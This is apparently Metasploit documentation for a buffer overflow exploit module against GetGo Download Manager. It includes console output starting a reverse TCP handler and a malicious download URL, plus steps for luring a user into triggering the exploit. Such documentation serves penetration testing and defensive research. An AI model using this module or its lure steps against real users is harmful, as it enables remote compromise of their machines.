metasploit-gs/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md

Description

This modules adds a buffer overflow exploit for GetGo Download Manager, which supports 4.9.0.1982 and 5.3.0.2712. Versions prior should also be vulnerable.

This exploit has been tested on Windows XP SP3. The vulnerable software can be downloaded at GetGo Download Manager 5.3.0.2712

To use this, first start the module like the following example:

msf exploit(windows/browser/getgodm_http_response_bof) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.12:4444 
msf exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3
[*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3
[*] Server started.

The exploit should give you a fake link. Pass this link to the Getgo user, and instruct them to do the following:

1. Start GetGo Download Manager
2. Click on the DOWNLOAD button
3. Click on New (if the link is already copied to the clipboard, clicking on this should trigger the download, and get exploited).
4. If the link isn't in the clipboard, instruct the user to enter the URL in the URL field, and click OK. The user should also get exploited this way.